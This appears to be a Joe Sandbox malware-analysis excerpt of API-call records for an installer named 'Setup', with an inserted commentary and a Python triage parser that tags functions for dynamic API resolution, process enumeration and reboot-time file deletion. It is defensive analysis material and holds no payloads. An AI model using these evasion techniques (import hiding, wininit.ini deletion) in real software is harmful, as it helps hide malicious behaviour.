• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
• String ID: %s: failed opening file "%s"$GetTTFNameString$name
• API String ID: 1916479912-1189179171
• Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
• Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
• Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
• Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
APIs
• GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
• GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
• lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
• lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406A73
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
• String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 3581403547-1792361021
• Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
• Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
• Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
• Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
APIs
• CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
Strings
• CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
• Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
• Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
• Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                        APIs
                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                        • String ID: F$N$open
                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                        APIs
                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
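Two of the records above are worth more than a glance during triage: the function at 004063EB-00406509, which loads PSAPI.DLL and binds EnumProcesses / EnumProcessModules / GetModuleBaseNameW through GetProcAddress (with the Toolhelp names CreateToolhelp32Snapshot / Process32FirstW / Process32NextW among its strings as the alternative path), and the function at 00406AD5-00406C88, which builds short path names, formats "%s=%s" and writes a "[Rename]" section to a file. APIs bound through GetProcAddress never appear in the import table, so an IAT-only scan misses them; and "[Rename]" with "NUL" as the target is the wininit.ini convention for deleting an in-use file at the next reboot. The following is an added example, not part of the Joe Sandbox report and not code from the sample or from Joe Security: a small Python parser for the "APIs" / "Similarity" record format used in this section, run over a constructed excerpt of those two records (argument lists trimmed), which reconstructs each function's call sequence, collects the run-time-resolved names, and tags the function with a behaviour. The tag names and the rules are this example's own choices, not report fields.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not
report code). SAMPLE is a constructed excerpt of two records from this
section, with long argument lists trimmed; tag rules are this example's own."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "• Api.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
# wsprintfA is listed without an argument list, so the parenthesised group is optional.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
KV_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Process-enumeration APIs: the PSAPI family and the Toolhelp family.
PROC_ENUM_APIS = {"EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
                  "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                          # call-site address as printed in the report
    subcall_of: Optional[str] = None  # set when the call happens inside a callee


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # 'String ID' entries ('$'-separated)
    opcode_id: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; each 'APIs' header starts a new one."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                     m.group("ref"), m.group("subfn")))
            continue
        m = KV_LINE.match(line)
        if m and m.group("key") == "String ID":
            cur.strings = [s for s in m.group("val").split("$") if s]
        elif m and m.group("key") == "Opcode ID":
            cur.opcode_id = m.group("val")
    return records


def resolved_names(rec: FunctionRecord) -> set:
    """Names bound at run time via GetProcAddress(hModule, "Name"); these are
    absent from the import table, so an IAT-only scan would miss them."""
    return {c.args[1] for c in rec.calls
            if c.api == "GetProcAddress" and len(c.args) > 1
            and not re.fullmatch(r"[0-9A-F]{8}", c.args[1])}


def tag_behaviours(rec: FunctionRecord) -> List[str]:
    """Rule-based behaviour tags for one function (rules are this example's own)."""
    tags = set()
    apis = {c.api for c in rec.calls}
    dyn = resolved_names(rec)
    if dyn:
        tags.add("dynamic-api-resolution")
    if (dyn | set(rec.strings)) & PROC_ENUM_APIS:
        tags.add("process-enumeration")
    # "[Rename]" plus "%s=%s" written to a file is the wininit.ini convention for
    # renaming or deleting in-use files at reboot; a NUL target means delete.
    if "[Rename]" in rec.strings and "WriteFile" in apis:
        tags.add("reboot-rename-delete")
    if any(c.api == "ShellExecuteW" and len(c.args) > 1 and c.args[1] == "open"
           for c in rec.calls):
        tags.add("shell-open")
    return sorted(tags)


SAMPLE = """\
APIs
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
Strings
Similarity
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
APIs
• lstrcpyW.KERNEL32(00465E20,NUL,?), ref: 00406AD5
• GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
• wsprintfA.USER32 ref: 00406B79
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
• WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
• CloseHandle.KERNEL32(?), ref: 00406C88
Similarity
• String ID: ^F$%s=%s$NUL$[Rename]$plF
• Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.opcode_id[:12], [c.api for c in rec.calls], tag_behaviours(rec))
```

Feeding the whole report section in instead of SAMPLE works unchanged, since the parser keys only on the "APIs" header, the bulleted call lines and the "String ID" / "Opcode ID" fields; the dump-source and fuzzy-hash lines are ignored. The Opcode ID is kept so a tagged function can be matched against the same hash in other reports.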
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                        • String ID: F
                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
